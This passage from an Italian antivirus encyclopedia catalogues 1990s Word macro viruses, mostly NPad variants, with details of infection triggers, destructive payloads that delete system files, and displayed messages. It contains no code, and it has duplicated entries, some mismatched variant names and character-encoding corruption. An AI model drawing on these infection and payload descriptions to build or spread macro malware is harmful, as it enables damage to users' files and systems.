grado di creare virus da macro e cavalli di Troia da macro. [Word_NJ-WMDLK1.D (a.k.a. Archie)] Nome del virus: Word.NJ-WMDLK1.D (a.k.a. Archie) Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: AutoNew, AutoClose, AutoExec, AutoOpen, BlackEnd Lunghezza della Macro: 2102 Byte Paese di origine: Sconosciuto Data di origine: Sconosciuta Payload: No Rilevato In-The-Wild: No Descrizione: NJ-WMDLK1.D infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (AutoOpen), chiusi (AutoClose), viene avviato Microsoft Word (AutoExec), e quando viene creato un nuovo file (AutoNew). Si tratta di un virus creato con un kit di costruzione di virus da macro. Il kit Φ disponibile in 5 diverse versioni ed Φ in grado di creare virus da macro e cavalli di Troia da macro. Nella macro "Archie" si pu≥ trovare il seguente testo: " A Virus from Nightmare Joker's Demolition Kit! " " Translated into English by Dark Night (VBB) " [Word_Nomvir.A:De] Nome del virus: Word.Nomvir.A:De Tipo di Virus: Virus da macro di Word Numero di Macro: 10 Criptato: Si Nomi delle Macro: AutoExec, AutoNew, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiBeenden, ExtrasOptionen, DateiDokvorlagen, DateiDrucken, FuckIt, Lunghezza della Macro: 5660 Byte Paese di origine: Germania Data di origine: Gennaio 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: Nomvir infetta il modello di documento principale (normal.dot) quando viene creato un nuovo documento (AutoNew) o avviato Microsoft Word (AutoExec). Altri documenti si infettano quando sono salvati con i comandi DateiSpeichern o DateiSpeichernUnter. Nomvir contiene diverse procedure distruttive. Cerca di sostituire parole con la parola "hell", cancella C:\Autoexec.bat e C:\Config.sys, o aggiunge alla fine del documento il seguente testo: " Fuck Microsoft & Bill Gates " Altre procedure vengono attivate il giorno 23 di ogni mese, sabato 13, 1gennaio e 25 dicembre. A queste date cerca di cancellare i seguenti: " C:\WINDOWS\USER.DAT " " C:\WINDOWS\USER.DA0 " " C:\WINDOWS\SYSTEM.DA0 " " C:\WINDOWS\SYSTEM.DAT " Novir.A non attiva le proprie procedure se trova la sezione "Compatibility" in WIN.INI: Nomvir=0x0690690" Quando viene selezionato il menu Tools/Macro compare il seguente messaggio: " Nicht genⁿgend Arbeitsspeicher ! " (tradotto: memoria insufficiente) Quando viene selezionato il menu "DateiDokvorlagen"compare il seguente messaggio: " Interner Fehler ! " (tradotto: Errore interno) [Word_Nomvir.B:De] Nome del virus: Word.Nomvir.B:De Tipo di Virus: Virus da macro di Word Numero di Macro: 10 Criptato: Si Nomi delle Macro: AutoExec, AutoNew, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiBeenden, ExtrasOptionen, DateiDokvorlagen, DateiDrucken, FuckIt, Lunghezza della Macro: 5660 Byte Paese di origine: Germania Data di origine: Gennaio 1997 Payload: Si Rilevato In-The-Wild: No Descrizione: Nomvir.B infetta il modello di documento principale (normal.dot) quando viene creato un nuovo documento (AutoNew) o avviato Microsoft Word (AutoExec). Altri documenti si infettano quando sono salvati con i comandi DateiSpeichern o DateiSpeichernUnter. La differenza maggiore tra questa nuova versione e la versione "A" Φ che le macro "DateiDrucken" e "DateiBeenden" non sono pi∙ alterate. DateiBeenden (tradotto: FileClose) Φ responsabile di una nuova procedura. Con il 20% di probabilitα, Nomvir.B aggiunge una password al documento attivo. Questa password Φ formata da 5 lettere (iATeS) pi∙ una sesta scelta a caso. Per ulteriori informazioni vedere la descrizione del virus Nomvir.A. [Word_Nop.A:De] Nome del virus: Word.Nop.A:De Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoOpen, NOP (DateiSpeichern) Lunghezza della Macro: 246 Byte Paese di origine: Germania Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: NOP.A Φ un virus molto primitivo e necessita di pochissimi comandi per replicarsi. L'unica particolaritα del virus NOP Φ che spegne i suggerimenti di Word prima di salvare il modello di documento principale (NORMAL.DOT). Quando viene aperto un documento infetto, NOP si trasferisce nel modello di documento principale e rinomina "NOP" con "DateiSpeichern". Altri documenti si infettano quando vengono salvati. [Word_Nop.B:De] Nome del virus: Word.Nop.B:De Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: No Nomi delle Macro: AutoOpen, NOP (DateiSpeichern) Lunghezza della Macro: 250 Byte Paese di origine: Germania Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione ed il virus NOP.A Φ che NOP.B non spegne i suggerimenti di Microsoft Word Prima di salvare il modello di documento principale (normal.dot). Aggiunge anche la parola "Testvirus" nel punto di entrata. Per ulteriori informazioni vedere la descrizione del virus NOP.A. [Word_NOP.D] Nome del virus: Word.NOP.D Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen, NOP Lunghezza della Macro: 234 Byte Paese di origine: USA Data di origine: Gennaio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: NOP.D Φ una nuova versione basata sul virus Nop.A. L'unica differenza tra i due virus Φ che NOP.D Φ in grado di infettare la versione inglese di Microsoft Word, mentre NOP.A lavora solo con la versione tedesca. Per ulteriori informazioni vedere la descrizione del virus NOP.A. [Word_NPad.A (DOEUNPAD)] Nome del virus: Word.NPad.A (DOEUNPAD) Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Bandung, Indonesia Data di origine: Marzo 1996 Payload: Si Rilevato In The Wild: Si Descrizione: NPad si attiva quando viene aperto un documento infetto (AutoOpen). NPad.A modifica la sezione "compatibility" nel file WIN.INI. Aggiunge un contatore con il nome di "NPAD328" ed ogni volta che si attiva, aggiunge 1 al suo valore. Raggiunto il valore 23 azzera il contatore e compare nella barra di stato il seguente messaggio: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " [Word_NPad.B] Nome del virus: Word.NPad.B Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Bandung, Indonesia Data di origine: Marzo 1996 Distruttivo: No Rilevato In-The-Wild: No Descrizione: La differenza tra questa nuova versione ed il virus NPad originale Φ che alcuni Byte, nel codice macro del virus, sono stati aggiornati Il risultato delle modifiche Φ un'istruzione non valida. NPad.B Φ in grado di infettare il modello di documento principale ed altri documenti, al raggiungimento della parte invalidata del codice della macro, mostra un messaggio d'errore di sintassi. Il messaggio dal virus Npad originale non compare mai. [Word_NPad.C] Nome del virus: Word.NPad.C Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.C Φ una versione del vecchio virus NPad.A. L'unica differenza tra i due virus Φ che NPad.C Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.C esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.C non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic [Word_NPad.D] Nome del virus: Word.NPad.D Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Indonesia Data di origine: Gennaio 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.D Φ una versione meno importante del virus NPad.A. L'unica differenza tra i due virus Φ che NPad.D Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.D esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.D non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic. [Word_NPad.E] Nome del virus: Word.NPad.E Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.E Φ una versione meno importante del virus NPad.A. L'unica differenza tra i due virus Φ che NPad.E Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.E esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.E non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic. [Word_NPad.F] Nome del virus: Word.NPad.F Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.F Φ una versione meno importante del virus NPad.A. L'unica differenza tra i due virus Φ che NPad.F Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.F esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.F non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic. [Word_NPad.G] Nome del virus: Word.NPad.G Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.G Φ una versione meno importante del virus NPad.A. L'unica differenza tra i due virus Φ che NPad.G Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.G esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.G non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic [Word_NPad.I] Nome del virus: Word.NPad.I Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.I Φ una versione meno importante del virus NPad.A. L'unica differenza tra i due virus Φ che NPad.I Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.I esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.I non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic [Word_NPad.M] Nome del virus: Word.NPad.M Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: NPad.M Φ una versione meno importante del virus NPad.A. L'unica differenza tra i due virus Φ che NPad.M Φ una versione alterata, con alcuni Byte presi dal virus NPad.A. Come risultato dell'alterazione, NPad.M esegue solo alcuni propri codici. L'infezione del modello di documento principale e di altri documenti Φ sempre attiva, tuttavia NPad.M non mostra mai il messaggio originale del virus NPad.A. Mostra invece un messaggio d'errore di WordBasic [Word_NPad.AB] Nome del virus: Word.NPad.AB Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AB possiede delle differenze irrilevanti del codice. NPad.AB modifica la sezione "compatibility" nel file WIN.INI. Aggiunge un contatore dal nome "NPAD328" Ed ogni volta che il virus si attiva, aggiunge 1 al suo valore. Al raggiungimento del valore 23 azzera il contatore e mostra nella barra di stato il seguente messaggio: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_NPad.AD] Nome del virus: Word.NPad.AD Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AD possiede dei codici alterati. Come risultato dell'alterazione, NPad.AD esegue solo alcuni dei suoi codici virali. Npad.AD infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AE] Nome del virus: Word.NPad.AE Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AE possiede dei codici alterati. Come risultato dell'alterazione, NPad.AE esegue solo alcuni dei suoi codici virali. Npad.AE infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AF] Nome del virus: Word.NPad.AF Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AF possiede delle irrilevanti modifiche al codice e il contatore alterato. L'infezione del modello di documento principale si verifica quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_NPad.AG] Nome del virus: Word.NPad.AG Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AG possiede dei codici alterati. Come risultato dell'alterazione, NPad.AG esegue solo alcuni dei suoi codici virali. Npad.AG infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AH] Nome del virus: Word.NPad.AH Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AH possiede dei codici alterati. Come risultato dell'alterazione, NPad.AH esegue solo alcuni dei suoi codici virali. Npad.AEH infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AI] Nome del virus: Word.NPad.AI Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AI possiede dei codici alterati. Come risultato dell'alterazione, NPad.AI esegue solo alcuni dei suoi codici virali. Npad.AEI infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AJ] Nome del virus: Word.NPad.AJ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AI possiede dei codici alterati. Come risultato dell'alterazione, NPad.AJ esegue solo alcuni dei suoi codici virali. Npad.AEJ infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AK] Nome del virus: Word.NPad.AK Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: La sola differenza tra questa nuova versione ed i precedenti NPad Φ che NPad.AK possiede delle irrilevanti modifiche al codice. NPad.AK modifica la sezione "compatibility" nel file WIN.INI. Aggiunge un contatore dal nome "NPAD328" ed ogni volta che il virus si attiva, aggiunge 1 al suo valore. Al raggiungimento del valore 23 azzera il contatore e aggiunge alla barra di stato il seguente messaggio: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_NPad.AM] Nome del virus: Word.NPad.AM Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AM possiede dei codici alterati. Come risultato dell'alterazione, NPad.AM esegue solo alcuni dei suoi codici virali. Npad.AEM infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. Nome del virus: Word.NPad.AN Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Svizzera Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: L'unica differenza tra questa nuova versione ed i precedenti virus NPad Φ che NPad.AM possiede dei codici alterati. Come risultato dell'alterazione, NPad.AN esegue solo alcuni dei suoi codici virali. Npad.AEN infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AO] Nome del virus: Word.NPad.AO Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In-The-Wild: No Descrizione: La sola differenza tra questa nuova versione ed i precedenti NPad Φ che NPad.AO possiede delle irrilevanti modifiche al codice. NPad.AO modifica la sezione "compatibility" nel file WIN.INI. Aggiunge un contatore dal nome "NPAD328" ed ogni volta che il virus si attiva, aggiunge 1 al suo valore. Al raggiungimento del valore 23 azzera il contatore e aggiunge alla barra di stato il seguente messaggio: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (AutoOpen) [Word_NPad.AN] Nome del virus: Word.NPad.AN Tipo di Virus: Virus da macro di Word Numero di Macro: 1. Criptato: Si. Nomi delle Macro: AutoOpen. Lunghezza della Macro: 1831 Byte. Paese di origine: Svizzera. Data di origine: Primavera 1997. Distruttivo: No. Rilevato In The Wild: No. Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AN ha alcuni codici alterati. Come risultato dell'alterazione, NPad.AN esegue solo alcuni dei suoi codici virali. Npad.AN infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti. [Word_NPad.AO] Nome del virus: Word.NPad.AO Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AO ha alcuni codici alterati. NPad.AO modifica la sezione "compatibility" nel file WIN.INI. Aggiunge un contatore dal nome "NPAD328" ed ogni volta che il virus si attiva, aggiunge 1 al suo valore. Al raggiungimento del valore 23 azzera il contatore e aggiunge alla barra di stato il seguente messaggio " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti si infettano quando vengono aperti (AutoOpen) [Word_NPad.AP] Nome del virus: Word.NPad.AP Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AP ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AP esegue solo alcuni propri codici. Infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.AQ] Nome del virus: Word.NPad.AQ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AQ ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AQ esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_Npad.AS] Nome del virus: Word.NPad.AS Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AS ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AS esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.AU] Nome del virus: Word.NPad.AU Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Australia Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AU ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AU esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_Npad.AV] Nome del virus: Word.NPad.AV Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AV ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AV esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_Npad.AW] Nome del virus: Word.NPad.AW Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Olanda Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AW ha un solo Byte modificato. NPad.AW modifica la sezione "compatibility" all'interno del file WIN.INI. Aggiunge un contatore chiamato "NPAD328" Ed ogni volta che il virus viene attivato, aggiunge 1 al proprio valore. Arrivato a 23 azzera il contatore e mostra il seguente messaggio sulla barra di stato: " DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia " Infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_NPad.AX] Nome del virus; Word.NPad.AX Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AX ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AX esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word _NPad.AY] Nome del Virus: Word.NPad.AY Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AY ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AY esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.AZ] Nome del virus: Word.NPad.AZ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.AZ ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.AZ esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.BA] Nome del virus: Word.NPad.BA Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BA ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BA esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word _NPad.BC] Nome del virus: Word.NPad.BC Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Australia Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BC ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BC esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.BD] Nome del virus: Word.NPad.BD Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BD ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BD esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.BE] Nome del virus: Word.NPad.BE Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BE ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BE esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.BF] Nome del virus: Word.NPad.BF Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BF ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BF esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). [Word_NPad.BG] Nome del virus: Word.NPad.BG Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1831 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova variante ed i precedenti virus NPad Φ che NPad.BG ha meno variazioni del codice e meno procedure distruttive. Come risultato dell'alterazione, NPad.BG esegue solo alcuni propri codici. L'infezione del modello di documento principale si ha quando viene aperto un documento infetto. Altri documenti sono infettati quando vengono aperti (AutoOpen). 